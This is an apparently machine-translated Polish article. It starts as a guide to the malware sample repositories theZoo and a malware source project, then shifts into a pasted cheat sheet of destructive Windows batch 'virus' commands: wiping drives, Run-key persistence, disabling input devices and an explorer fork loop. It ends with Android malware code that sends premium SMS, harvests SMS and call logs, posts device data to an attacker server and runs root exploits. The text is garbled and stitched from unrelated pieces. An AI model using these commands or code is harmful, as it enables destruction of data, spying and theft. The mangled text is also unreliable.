Skąd pobrać próbki wirusów z kodem źródłowym i szczegółowym opisem?

Znalezienie zbioru odpowiednich wirusów, a tym bardziej opisu i kodu źródłowego, nie jest łatwym zadaniem. Powiedzieliśmy już, gdzie do analizy i badań. Dzisiaj opowiem o innym źródle, w którym można znaleźć i pobrać, ale tym razem nie chodzi tylko o złośliwe oprogramowanie znalezione w sieci, ale o pliki wykonawcze i źródła wirusów ze szczegółowymi informacjami.

W tym artykule dowiesz się o kilku interesujących projektach, które oferują zanurzenie się w świecie kodu źródłowego wszelkiego rodzaju trojanów, botnetów, programów zatrzymujących, robaków itp.

• Przedmowa
• Źródła wirusów
• Projekt TheZoo
• Projekt złośliwego oprogramowania

Dlaczego i kto może potrzebować próbek wirusów?

Pliki wykonywalne i źródła wirusów mogą być potrzebne do analizy technologii wykorzystywanych przez złośliwe oprogramowanie, badania zachowania wirusów w systemie (monitorowanie systemu plików, procesów) oraz testowania programów antywirusowych. Pracownicy firm antywirusowych są gotowi zapłacić pieniądze, aby uzyskać źródło nowego wirusa.

Czy pobieranie wirusów jest legalne?

Możesz pobrać próbki wirusów do badań i analiz na swój komputer, ale nie możesz ich rozpowszechniać ani infekować nimi. Więcej na ten temat w artykule 273 Kodeksu karnego.

Celem tych projektów jest przekazanie firmom antywirusowym i osobom zainteresowanym analizą wirusów zrozumienia szkodliwego kodu urządzenia.

Uwaga! Pamiętaj, że pobrane pliki działają wirusami. Niektóre z nich spróbują zainfekować komputer. W żadnym wypadku nie uruchamiaj pobranych plików na głównym komputerze. Nie polecam również pobierania próbek wirusów bez dużej wiedzy na temat analizy złośliwego oprogramowania.

W każdym razie strona www.site nie ponosi żadnej odpowiedzialności za szkody, które wyrządzisz swoim i innym komputerom.

Bardzo polecam korzystanie. Nie zapomnij o złośliwych robakach, które będą próbowały rozprzestrzeniać się i zabraknąć maszyny wirtualnej. Aby tego uniknąć, zalecam wyłączenie wszystkich dodatków gościa dla maszyn wirtualnych, dostępu do sieci itp. Możesz dowiedzieć się, jak to zrobić, korzystając z powyższego linku.

Źródła wirusów: projekt theZoo

Recenzję rozpoczynamy od projektu Zoo, który tłumaczy się jako zoo (autorzy mają poczucie humoru). Znajduje się w repozytorium Githab.

Celem projektu jest udostępnienie badania nad wirusami. Autorzy zbierają i aktualizują bazę wirusów. Dzięki theZoo masz dostęp do popularnych próbek złośliwego oprogramowania.

Próbki wirusów: projekt theZoo

Do pobrania i opracowania oferowany jest zarówno plik wykonywalny, jak i źródła.

Jak korzystać z theZoo?

Możesz używać projektu Zoo na różne sposoby: bezpośrednio ze strony lub przy użyciu frameworka. Rozważymy oba sposoby. Zacznijmy od pierwszego.

Wchodzimy na stronę i widzimy kilka katalogów i plików.

Pliki wykonywalne wirusów znajdują się w katalogu:

theZoo / malwares / binaries /

Znajdziesz w nim plik wykonywalny wirusów. Dla każdego szkodliwego oprogramowania istnieje osobny katalog, w którym znajdują się 4 pliki: samo szkodliwe oprogramowanie jest szyfrowane w archiwum ZIP, SHA256 i MD5 są sumami kontrolnymi archiwum do porównania i hasłem do zaszyfrowanego archiwum.

Pliki wykonywalne wirusów: trojan Androrat

Kod źródłowy wirusa znajdują się w katalogu:

theZoo / malwares / Source / Original /

Każdy katalog ma cztery podobne pliki. Wszystko jest tak samo jak w przypadku plików wykonywalnych.

Źródła wirusów: trojan Dendroid

Istnieje pomoc dla każdej indywidualnej próbki, ale aby skorzystać z pomocy potrzebnej do zainstalowania frameworka.

Aby zainstalować środowisko Zoo, użyj polecenia:

klon git https://github.com/ytisf/theZoo

Wymagania: urllib2, python3

Polecenia: wyszukuj, używaj, pobieraj, informacje, wyświetlaj wszystkie, report-mal, update-db, exit. Dowiedz się więcej o poleceniach za pomocą polecenia pomocy.

Po opracowaniu tego projektu rozważ teraz inny.

Próbki wirusów: Malware Project

Projekt złośliwego oprogramowania znajduje się również na Githab. Wybór wirusów nie jest tak duży jak w zoo, ale jest aktualizowany częściej. Wśród niewielkiej liczby szkodliwych programów można znaleźć kody źródłowe trojanów, botnetów, oprogramowania ransomware, kradnących hasła i innych „dobrych” rzeczy.

Oto lista na dziś:

• Alina Spark (Troyan)
• Bleeding Life 2 (Expolit Pack)
• Carberp (botnet)
• Carberp (trojan bankowy)
• Crimepack 3.1.3 (pakiet Exploit)
• Dendroid (trojan dla Androida)
• Dexter v2 (Troyan)
• Eda2, Stolich, Win32.Stolich (Ransomware)
• FlexiSpy (oprogramowanie szpiegujące)
• (Struktura)
• GMBot (trojan dla Androida)
• Gozi-ISFB - (trojan bankowy)
• Grum (spam bot)
• Zespół hakerów RCS ()
• Hidden Tear (Extortionist)
• KINS (trojan bankowy)
• Mirai (Internet rzeczy Botnet)
• Pony 2.0 (Password Styler)
• PowerLoader (botnet)
• RIG Front-end (pakiet Exploit)
• Rovnix (Butkit)
• Tinba (trojan bankowy)
• TinyNuke (trojan bankowy)
• Trochilus, RedLeaves (RAT)
• Zeus (trojan bankowy)

Kod źródłowy wirusa: Malware Project

Przejdźmy na przykład do folderu Alina Trojan. Tutaj oferujemy kilka katalogów, wśród których znajdują się kody źródłowe. Ponadto u dołu autorów dodano linki do informacji dotyczących złośliwego oprogramowania.

oto polecenia
assoc .exe \u003d .mp3-Pliki wykonywalne zaczynają się jako wytwórnia muzyczna E: pridurok-śruba zmienia się w czas kretyna 00:00 - zmień czas
data 13.03.36-zmień datę assoc .lnk \u003d .txt-zmień etykiety w pliku TXT kopia% 0 F: \\ Work.bat-skopiuj obiekt

1) Program do usuwania plików z dysku flash (jeśli jest włożony) i zmiany jego nazwy.
del F: \\ *. * / q
etykieta F: HACK
2) Program do zmiany daty i godziny na komputerze oraz kopiowania go na dysk C i na dysk flash USB.
czas 14:13
data 07.11.12
kopiuj% 0 C: \\ Time.bat
kopiuj% 0 F: \\ Time.bat
----------
\u003e wiersz polecenia nul-hide
% SystemRoot% / system32 / rundll32 user32, SwapMouseButton-zamiana klawiszy myszy
---------------
skopiuj ""% 0 ″ ""% SystemRoot% \\ system32 \\ File.bat "
reg dodaj „HKLM \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run” / v „Filel” / t REG_SZ / d "% SystemRoot% \\ system32 \\ File.bat" / f
reg dodaj HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer / v NoControlPanel / t REG_DWORD / d 1 / f
Bardzo okrutny zespół: dodaje program do uruchamiania systemu operacyjnego.
„Del x: \\ y *. * / Q” - usunie wszystkie pliki na dysku x w folderze y (z wyjątkiem folderów) (przykład del F: \\ Data *. * / Q);
„Użytkownik sieci„ x ”/ dodaj” - doda do komputera użytkownika pod nazwą x (np. Użytkownik sieci „Wędzony” / dodaj);
Na początku naszego wirusa pojawia się „@Echo off” i wszystko ukrywa
rundll32 user, disableoemlayer - awaria systemu (!) - wyłącza wszystkie funkcje I / O (klawiatura, wyświetlacz, mysz). Wynikiem będzie czarny ekran z kursorem i niereagującym systemem, ale system Windows nadal działa.
del *. * / q (po uruchomieniu tego polecenia wszystkie pliki oprócz folderów znajdujących się w folderze, w którym uruchomiono wirusa, zostaną usunięte !!!
md 1-create folder
Aby uruchomić plik podczas uruchamiania systemu Windows, zmień nazwę pliku na Autoexec.bat
Wirus Echo Ładowanie-napis na ekranie wirusa domków
del c: Program Files / q (usuwa wszystkie pliki z tego folderu)
reg - bezpośrednia praca z rejestrem. Oglądaj reg /? wszystkim!
rcp - udostępnianie plików przez rcp w ascii
runy - jako użytkownik
tasklist - wyświetla powiązane z nim aplikacje i sesje.
taskkill - pozwala ukończyć jeden lub więcej procesów
tftp - trywialny ftp
tskill - zabij proces
reg - narzędzie do obsługi rejestru
bootcfg - ustawianie boot.ini
append - pozwala otwierać usunięte pliki tak, jakby były w bieżącym.
getmac - zdobądź mas
wyloguj się - Zakończ sesję użytkownika.
mem - wyświetla informacje o bieżących procesach w pamięci RAM
mqbkup - archiwizacja
netsh - ??
openfiles - przeglądaj otwarte pliki.
rsh - wykonywanie poleceń na zdalnych hostach z uruchomionym rsh
sc - linia poleceń ??
rexec - wykonywanie poleceń na zdalnych hostach z uruchomionym rexec
shutdown - zamknij (hehe) komputer lokalny lub zdalny.
systeminfo - wyjście informacji o komputerze.
schtasks - harmonogram zadań.
xcopy - kopiuj pliki i katalogi.
tsshutdn - zamknięcie serwera w określony sposób.
set - wyświetla, ustawia i usuwa zmienne środowiskowe cmd.exe. Właściwości systemu (pr. ”My comp”) - opcjonalnie - Zmienne środowiskowe. Nie wszystkie zmienne, ale wiele! Wszystko do obejrzenia jest właśnie ustawione.
Nawiasem mówiąc, oto niektóre polecenia RunDLL, których można używać podczas tworzenia plików wsadowych

użytkownik rundll32, wnetdisconnectdialog
Okno „Odłącz dysk sieciowy”

użytkownik rundll32, disableoemlayer
Nie prowokować

użytkownik rundll32, repaintscreen
Aktualizacja (jak)

użytkownik rundll32, setcursorpos
Kursor Maus w lewym górnym rogu do sadzenia

rundll32 diskcopy, DiskCopyRunDll
Okno „Kopiuj dysk”

rundll32 rnaui.dll, RnaWizard / 1
Dialog „Nawiąż połączenie” (/ 1 \u003d bez okna)

rundll32 Shell, Shellexecute
Otwórz okno Eksploratora w katalogu głównym

rundll32 shell32, OpenAs_RunDLL
Okno „Otwórz za pomocą ...” ***

rundll32 shell32, SHFormatDrive
Wywołanie okna „Format: Disk3,5 (A)”

rundll32 shell32, ShellAboutA
Połączenie z Info-Box (o Windows)

rundll32 shell32, SHExitWindowsEx 0
Windows 98 do zrestartowania (bez autoexec.bat itp.)

rundll32 shell32, SHExitWindowsEx 1
Wykończenie systemu Windows 98

rundll32 shell32, SHExitWindowsEx 2
Rozruch systemu Windows-98-PC

rundll32 shell32, SHExitWindowsEx -1
Ponowne uruchomienie Windows-98-Explorer

rundll32 shell32, Control_RunDLL
Otwórz okno „Panel sterowania”

rundll32 shell32, Control_RunDLL desk.cpl
Otwórz „Właściwości ekranu”

rundll32 shell32, Control_RunDLL main.cpl
Otwórz moduły panelu sterowania od MAIN.CPL **

rundll32 krnl386.exe, exitkernel
wyjść z systemu Windows bez żadnych wiadomości / pytań

użytkownik rundll32, swapmousebutton
„Reset” klawiszy myszy *

klawiatura rundll32, wyłącz
Wyłącz typ klawiatury *

mysz rundll32, wyłącz
Mysz „Wyłącz” *

rundll rnaui.dll, „dostawca” RnaDial
Wywołaj okno „Łączność” o nazwie „dostawca”

użytkownik rundll32, tilechildwindows
zbuduj wszystkie niezminimalizowane okna aż do samej góry

użytkownik rundll32, cascadechildwindows
buduj wszystkie niezminimalizowane okna w kaskadzie

rundll32 sysdm.cpl, InstallDevice_Rundll
(tylko opcja w W98) zainstaluj sprzęt niezgodny z Plug & Play

rundll32 msprint2.dll, RUNDLL_PrintTestPage
wybierz drukarkę z wyświetlonego menu i wyślij do niej test

użytkownik rundll32, setcaretblinktime
ustaw nowy migający kursor częstotliwości *

użytkownik rundll32, setdoubleclicktime
ustaw nową szybkość podwójnego kliknięcia *

rundll32 setupx.dll, InstallHinfSection
DefaultInstall 130; C: \\ file.inf
okno „System Perezapysk. Wyprodukować to teraz? Tak / nie ”****

ASSOC - wyświetla lub modyfikuje powiązania rozszerzeń plików
AT - Planuje uruchamianie poleceń i programów na komputerze.
ATTRIB - wyświetla lub modyfikuje atrybuty pliku.
PRZERWA - Ustaw lub anuluj sprawdzanie kombinacji.
CACLS - wyświetla lub modyfikuje listy kontroli dostępu (ACL) dla plików.
CALL - wywołuje jeden plik * .BAT z innego.
CD - Wyświetla nazwę lub zmienia nazwę bieżącego katalogu.
CHCP - wyświetla lub ustawia numer aktywnej strony kodowej.
CHDIR - Wyświetla nazwę lub zmienia nazwę bieżącego katalogu.
CHKDSK - sprawdza napęd i wyświetla raport o stanie.
CLS - czyści ekran.
CMD - Uruchamia się nowa instancja interpretera poleceń systemu Windows NT.
KOLOR - Ustawia domyślne kolory pierwszego planu i tła konsoli.
COMMAND - Uruchamia nową kopię interpretera poleceń systemu Windows.
COMP - Porównuje zawartość dwóch plików lub plików instalacyjnych.
COMPACT - Wyświetla lub modyfikuje kompresję plików w systemie Windows NT Patricia (NTFS).
CONVERT - Konwertuje woluminy FAT do formatu systemu plików Windows NT (NTFS). Nie można przekonwertować bieżącego dysku.
KOPIUJ - Skopiuj jeden lub więcej plików w inne miejsce.
CTTY - modyfikuje urządzenie końcowe używane do sterowania systemem.
DATA - Wyświetla lub ustawia datę.
DEL - usuwa jeden lub więcej plików.
DEBUG - wykonuje debugowanie, testowanie programów i narzędzi edycyjnych.
DIR - wyświetla listę plików i podkatalogów w katalogu.
DISKCOMP - porównuje zawartość dwóch dyskietek.
DISKCOPY - Skopiuj zawartość jednej dyskietki na drugą.
DOSKEY - Edytuje wiersze poleceń, przywraca polecenia systemu Windows i tworzy makro.
ECHO - wyświetla komunikaty lub włącza / wyłącza wyjście poleceń.
EMM386 - Włącza / wyłącza obsługę rozszerzonej pamięci EMM386.
ENDLOCAL - Kończy lokalizację zmian środowiskowych w pliku * .BAT.
KASUJ - usuwa jeden lub więcej plików.
EXIT - zatrzymuje wykonywanie programu (interpreter poleceń).
EKSTRAKT - Narzędzie do wydobywania informacji z plików CAB.
FC - porównuje dwa pliki lub pliki instalacyjne i wyświetla różnicę między nimi.
ZNAJDŹ - wyszukuje ciąg tekstowy w pliku lub plikach.
FINDSTR - Wyszukaj ciągi w plikach.
FOR - Wykonuje określone polecenie dla każdego pliku w zestawie plików.
FORMAT - formatuje dysk do użytku z systemem Windows.
FTYPE - wyświetla lub modyfikuje typy plików używane w powiązaniach rozszerzeń.
GOTO - Kieruje interpreter poleceń Windows NT do zaznaczonej linii w pliku * .BAT.
GRAFTABL - zdolność systemu Windows do wyświetlania pseudo-graficznych znaków wstawionych w trybie graficznym.
POMOC - zawiera informacje pomocy dla poleceń systemu Windows.
IF - Wykonuje przetwarzanie warunków w pliku * .BAT.
KEYB - Konfiguruje klawiaturę dla danego języka.
LABEL - Tworzy, modyfikuje lub usuwa etykietę woluminu na dysku.
LOADHIGH (LH) - Ładuje program do adresów górnej pamięci.
MD - Tworzy katalog.
MEM - Wyświetla ilość używanej i wolnej pamięci w systemie.
MKDIR - Tworzy katalog.
MODE - Konfiguruje urządzenie systemowe.
WIĘCEJ - Wyświetla wyjście jednego ekranu na raz.
MOVE - Przenosi jeden lub więcej plików z jednego katalogu do drugiego na tym samym dysku.
NETSTAT - wyświetla statystyki protokołu i bieżące połączenia sieciowe TCP / IP.
NLSFUNC - ładuje informacje specyficzne dla kraju.
ŚCIEŻKA - Wyświetla lub ustawia ścieżkę wyszukiwania plików wykonywalnych.
PAUZA - Wstrzymuje przetwarzanie pliku * .BAT i wyświetla komunikat.
POPD - Przywraca poprzednią wartość bieżącego katalogu przechowywanego w PUSHD.
DRUKUJ - Drukuje plik tekstowy.
PROMPT - Zmienia monit dla poleceń systemu Windows.
PUSHD - Zapisuje bieżący katalog, a następnie zmienia.
RD - usuwa katalog.
RECOVER - odzyskuje czytelne informacje z uszkodzonego lub uszkodzonego dysku.
REM - Zapisuje komentarze (uwagi) do plików * .BAT lub CONFIG.SYS.
REN - zmienia nazwę pliku lub plików.
RENAME - zmienia nazwę pliku lub plików.
REPLACE - Zastępuje pliki.
PRZYWRÓĆ - Odzyskuje pliki, które zostały zarchiwizowane za pomocą polecenia BACKUP.
RMDIR - usuwa katalog.
SET - wyświetla, ustawia lub usuwa zmienne środowiskowe Windows.
SETLOCAL - Rozpoczyna lokalizację zmian środowiskowych w pliku * .BAT.
SETVER - Ustawia numer wersji MS-DOS, który system Windows informuje program.
SHIFT - Przesuwa pozycję zastąpionych parametrów w pliku * .BAT.
SMARTDRV - Instaluje i konfiguruje narzędzie buforowania dysku SMART.
SORT - Sortuje strumień wejściowy.
START - Uruchamia osobne okno w celu wykonania określonego programu lub polecenia.
SUBST - kojarzy ścieżkę z literą dysku.
SYS - Skopiuj pliki systemowe MS-DOS i interpreter poleceń na określony dysk.
CZAS - Wyświetla lub ustawia czas systemowy.
TITLE - Ustawia tytuł okna dla sesji.
DRZEWO - Graficznie wyświetla strukturę katalogów dysku lub ścieżki.
TYP - wyświetla zawartość pliku tekstowego.
VER - wyświetla wersję systemu Windows.
WERYFIKUJ - informuje system Windows, czy ma sprawdzić poprawność zapisu plików na dysku.
VOL - Wyświetla etykietę woluminu dysku i numer seryjny.
XCOPY - Kopiuj pliki i drzewa katalogów.

Cóż, jeśli chcesz „zabić” Windows, to:
@echo wyłączone
zacznij odkrywcę
zacznij odkrywcę
zacznij odkrywcę
uruchom eksploratora - powtórz 100 jeszcze raz i zarejestruj w autoloadie.

Kolekcja złośliwych aplikacji na Androida z niektórych laboratoriów antywirusowych zawiera już ponad 10 milionów próbek. Liczba ta pobudza wyobraźnię, ale około 9 milionów 995 tysięcy z nich to przemianowane kopie oryginalnych wirusów. Ale jeśli przeanalizujemy kod źródłowy pozostałych kilku tysięcy próbek malvari, zobaczymy, że wszystkie są połączone z niewielkiej liczby unikalnych bloków funkcjonalnych (kilka zmodyfikowanych i połączonych na różne sposoby).

Chodzi o to, że producenci kabli najczęściej wykonują bardzo trywialne zadania:

• wysłać SMS na płatny numer;
• przejąć w posiadanie poufne informacje o użytkowniku (numery telefonów, SMS-y, dane z karty SD itp.);
• zbierać dane o zainfekowanym urządzeniu;
• przejąć prawa administracyjne na urządzeniu (do instalowania aplikacji bez zgody właściciela lub do złośliwego wyłączania urządzenia);
• śledzić dane logowania, hasła i dane kart płatniczych, które użytkownik wprowadza na stronach systemów bankowości internetowej. Jak oni to robią? Spróbujmy penetrować ponury świat mobilnego okablowania i zobaczmy, co się tam dzieje.

Wysyłanie wiadomości SMS

Kto używa:

• Adsms
• FakePlayer
• HippoSms.

Najpopularniejszym rodzajem wirusów są trojany SMS. Wirusy te po prostu wysyłają wiadomości na płatne numery bez zgody użytkownika. Bardzo łatwo jest utworzyć taki program lub przepisać gotowy program na żądany numer. A proces uzyskiwania korzyści jest niezwykle uproszczony - w przeciwieństwie do, na przykład, śledzenia danych bankowych.

Oto najprostszy przykład kodu. Jest to elementarna funkcja wysyłania wiadomości SMS. Może to być skomplikowane przez sprawdzenie statusu wysyłania, wybranie numerów w zależności od lokalizacji subskrybenta, a następnie usunięcie SMS-a.

Prywatny statyczny SendSms (String DestNumber, String SmsText) (// Próba uruchomienia metody sendTextMessage obiektu SmsManager (standardowy program do wysyłania SMS-ów z bieżącego urządzenia) z minimalną liczbą parametrów: numer odbiorcy i wypróbuj tekst wiadomości (SmsManager.getDefault (). SendTextMessage (DestNumber , , SmsText, , null); return true;))

Gdzie szukać kodu wirusa?

W zdecydowanej większości przypadków infekcja telefonu następuje przez instalację aplikacji. Każda aplikacja na Androida istnieje w postaci pliku z rozszerzeniem apk, który w istocie jest archiwum. Możesz przeglądać jego zawartość za pomocą zestawu Android SDK, konwertera plików APK na JAR i dekompilatora kodu bajtowego Java. Kompilacja aplikacji (APK) składa się z następujących części:

• resources.arsc - tabela zasobów;
• res (folder) - faktycznie zasoby (ikony itp.);
• META-INF (folder) - zawiera pliki o następującej treści: sumy kontrolne zasobów, certyfikat aplikacji i opis zestawu APK;
• AndroidManifest.xml - wszystkie rodzaje informacji o usługach. W tym uprawnienia, o które aplikacja prosi przed instalacją o prawidłowe działanie;
• klas.dex - prawdopodobnie słyszałeś, że w systemach operacyjnych Android cały kod jest wykonywany przy użyciu maszyny wirtualnej Dalvik (od wersji 4.4 pojawia się obsługa ART), która nie rozumie zwykłego kodu bajtowego Java. Dlatego istnieją pliki z rozszerzeniem dex. Oprócz niezbędnych i przydatnych klas (które są odpowiedzialne za funkcjonalność aplikacji), zawiera również złośliwe oprogramowanie (kod wirusa, który analizujemy w tym artykule).

Zapis informacji o użytkowniku do pliku tekstowego

Kto używa:

• NickySpy;
• SmsSpy.

Istnieje kategoria wirusów, które polują na dane osobowe użytkowników. Mechanizm ich działania jest również prosty. Przesyłają pliki użytkownika na serwer swojego twórcy lub wstępnie gromadzą wszelkie dane w formacie txt (CSV, XML - nieważne). Kontakty dowolnego typu, wiadomości od różnych komunikatorów, pliki multimedialne itp. Mogą być interesujące dla atakujących.

Użytkownicy zainfekowani SMS-em to szczególnie cenne numery telefonów nadawców i odbiorców - mogą uzupełniać bazę danych w celu wysyłania spamu. Rzadziej tego rodzaju wirusy są wykorzystywane do infekowania urządzeń określonych osobowości - następnym razem twoja dziewczyna zaproponuje ci przetestowanie napisanej do niej aplikacji na Androida (ah, karamba! - wyd.), Nie trać czujności :).

// Odczytaj liczbę SMS-ów z tablicy urządzeńOfObject \u003d (Object) localBundle.get ("pdus"); int j \u003d arrayOfObject.length; // Pętla przez każdy SMS i \u003d 1 while (true) (if (i\u003e \u003d j) break; // Utwórz obiekt wiadomości SMS SmsMessage localSmsMessage \u003d SmsMessage.createFrompdu ((byte) arrayOfObject [i]); // Put do zmiennych łańcuchowych numer nadawcy, tekst i czas wysłania SMS Ciąg MessageNumber \u003d localSmsMessage.getOriginatingAddress (); String MessageText \u003d localSmsMessage.getDisplayMessageBody (); long l \u003d localSmsMessage.getTimestampMillis (); Data localDate \u003d nowa data (l); String MessageTime nowy SimpleDateFormat („rrrr-MM-dd GG: mm: ss”). format (localDate); // Utwórz ciąg z otrzymanych danych i zapisz go do pliku tekstowego przy użyciu metody WriteRec String MessageInfo \u003d 7MessageNumber + "#" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // Przejdź do następnej wiadomości i + \u003d 1;) Wygodne jest również uzupełnienie listy spamu z historii połączeń subskrybenta. Oto kod, który można uruchomić dla połączenia przychodzącego: If (parmIntent.getAction (). Equals („android.intent.action.NEW_OUTGOING_CALL”)) (// Wpisz numer subskrybenta String phonenumber \u003d paramIntent.getStringExtra („android.intent. extra.PHONE_NUMBER "); // Wygeneruj ciąg z numeru i daty wywołania Ciąg PhoneCallRecord \u003d numer telefonu +" # "+ getSystemTime (); // Wywołaj metodę WriteRec () (jego kodu nie podano tutaj), który dodaje ciąg do pliku tekstowego za pomocą Historia połączeń WriteRec (paramContext, „phonecall.txt”, PhoneCallRecord);)

Po zarejestrowaniu informacje są przekazywane do „prawej ręki”. Poniższy kod przesyła historię połączeń na serwer:

Prywatne void uploadPhonecallHistory () zgłasza IDException (while (true) (return; // Sprawdź, czy mamy plik, jeśli (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt ")) kontynuuj; // Tworzymy obiekt - narzędzie do pobierania plików UploadFiles localUploadFiles \u003d new UploadFiles (); String uploadkeynode \u003d getKeyNode ("uid", "uid_v"); // Uruchom metodę.advanceduploadfile (jego kodu nie podano tutaj), aby przesłać plik do lokalnego serwera twórców wirusów LocalUploadFiles. Advanceduploadfile (uploadkeynode, "/ data / data / spyapp.pg / files / phonecall.txt");))

Kolekcja informacji

Kto używa:

• DroidKungFu;
• DroidDream
• zdecydowana większość malwariów jest podobna.

Zasadniczo informacje o urządzeniach zainfekowanych jego programami są przydatne dla każdego twórcy wirusów. Uzyskanie go jest bardzo proste. Tablica jest tworzona z danymi o właściwościach telefonu (pełną listę można znaleźć w instrukcji dla programistów Androida) i wysyłana przez żądanie POST do skryptu PHP (język jest pozbawiony zasad) na serwerze atakującego, przetwarza dane i umieszcza je w bazie danych do późniejszego wykorzystania.

Private void reportState (int paramInt, string paramString) (// Utwórz tablicę i umieść w niej informacje o usłudze ArrayList UserInformation \u003d new ArrayList (); UserInformation.add (new BasicNameValuePair ("imei", this.mImei)); UserInformation.add ( new BasicNameValuePair ("taskid", this.mTaskId)); UserInformation.add (new BasicNameValuePair ("state", Integer.toString (paramInt))); // Jeśli funkcja ma zdefiniowany parametr paramString (komentarz), umieść go w tablicy i jego if (paramStrng! \u003d null) && (! "". equals (paramString))) UserInformation.add (new BasicNameValuePair („comment”, paramString)); // Utwórz żądanie HTTP POST z adresem skryptu, który zbiera dane HttpPost localHttpPost \u003d new HttpPost („http://search.virusxxxdomain.com:8511/search/rtpy.php”); try (// Dodaj naszą tablicę danych do żądania i uruchom ją przy użyciu standardowego klienta HTTP localHttpPost.setEntity (nowy UrlEncodeFormEntity (UserInformation, „UTF-8”))); nowa DefaultHttpClient (). execute (localHttpPost) .getStatusLine.getStatusCode (); powrót )))

Korzenie

Kto używa:

• DroidKungFu;
• DroidDream
• RootSmart.

Jedną z najbardziej irytujących rzeczy, które mogą się zdarzyć na urządzeniu z Androidem, jest jego wirus root. W końcu szkodliwy program może z tym zrobić wszystko: zainstalować inne wirusy, zmienić ustawienia sprzętowe. Ta akcja jest realizowana poprzez sekwencyjne uruchamianie exploitów:

Private void RootFunc () (ApplicationInfo localApplicationInfo \u003d getApplicationInfo (); / * „ratc” jest kopią słynnego exploita rootkitowego Rage Against The Cage. Kiall powstrzymuje wszystkie procesy uruchomione przez bieżącą aplikację. Gjsvro to exploit służący do nabywania praw udev (używany w Systemy Linux do zaawansowanej pracy z interfejsami sprzętowymi i sieciowymi.) Wszystko to jest kopiowane we właściwe miejsce * / Utils.copyAssets (this, „ratc”, „/ data / data” + localApplicationInfo.packageName + „/ ratc”); Utils .copyAssets (this, „killall”, „/ data / data” + localApplicationInfo.packageName + „/ killall”); Utils.copyAssets (this, „gjsvro”, „/ data / data” + localApplicationInfo.packageName + ”/ gjsvro "); // I uruchom za pomocą wiersza poleceń Utils.oldrun (" / system / bin / chmod "," 4755 /data/data"+localApplicationInfo.packageName + "/ ratc"); Utils.oldrun ("/ system / bin / chmod ”,„ 4755 /data/data"+localApplicationInfo.packageName + ”/ killall”); Utils.oldrun („/ system / bin / chmod”, „4755 /data/data"+localApplicationInfo.packag eName + „/ gjsvro”); new MyTread.start (); )

Mobilne witryny Malvari

Blog ekspercki Kasperskiy Lab Ten zasób zawiera wysokiej jakości i szczegółowe artykuły na temat wielu aspektów bezpieczeństwa komputera, w tym wirusów Androida. Powinieneś regularnie odwiedzać tę stronę, aby być na bieżąco z najnowszymi osiągnięciami.

Grupa jest dedykowana narzędziu typu open source do wszelkiego rodzaju manipulacji kodem aplikacji na Androida (dekompilacja i modyfikacja plików DEX / ODEX / APK itd.). Androguard zawiera również obszerną bazę artykułów o wirusach. Oprócz krótkich przeglądów funkcjonalności i metod ochrony, istnieją szczegółowe analizy kodu malvari.

Sekcja Zagrożenia mobilne na www.fortiguard.com Encyklopedia wirusów telefonicznych. Każdy artykuł jest przeglądem funkcjonalnym o smaku znacznej ilości szczegółów technicznych. Oprócz informacji o zagrożeniach dla systemu operacyjnego Android znajdują się artykuły na temat wirusów dla Symbian OS, iOS i innych platform.

Wirus ochrona

Niektórzy użytkownicy uważają, że jeśli pobierzesz aplikacje wyłącznie z Google Play i zainstalujesz program antywirusowy na swoim smartfonie, absolutnie zagwarantuje to bezpieczeństwo. Nie pochlebiaj sobie: wiadomości regularnie pojawiają się w Internecie na temat obecności malvari na oficjalnym rynku. Liczba nowo powstających szkodliwych programów jest mierzona w setkach tysięcy miesięcznie, co utrudnia ich szybkie wejście do baz danych programów antywirusowych. Prawdziwą gwarancję bezpieczeństwa można uzyskać ręcznie przeglądając kod pliku APK przed zainstalowaniem go w telefonie. Nie trzeba być guru kodowania, aby wykrywać złośliwe fragmenty. A nasz artykuł ci w tym pomoże.

Wniosek

Jak widać z przykładów, mobilne virmeyking nie różni się złożonością technologiczną. Oczywiście przykłady te zostały uproszczone do formatu dziennika - przede wszystkim pominięto procedury obsługi błędów i wyjątków, a także niektóre szczegóły techniczne, których brak nie uniemożliwi zrozumienia zasad Androida-malvari, ale ochroni przed niepotrzebnymi eksperymentami. W końcu nie wspieramy tworzenia wirusów, prawda? 🙂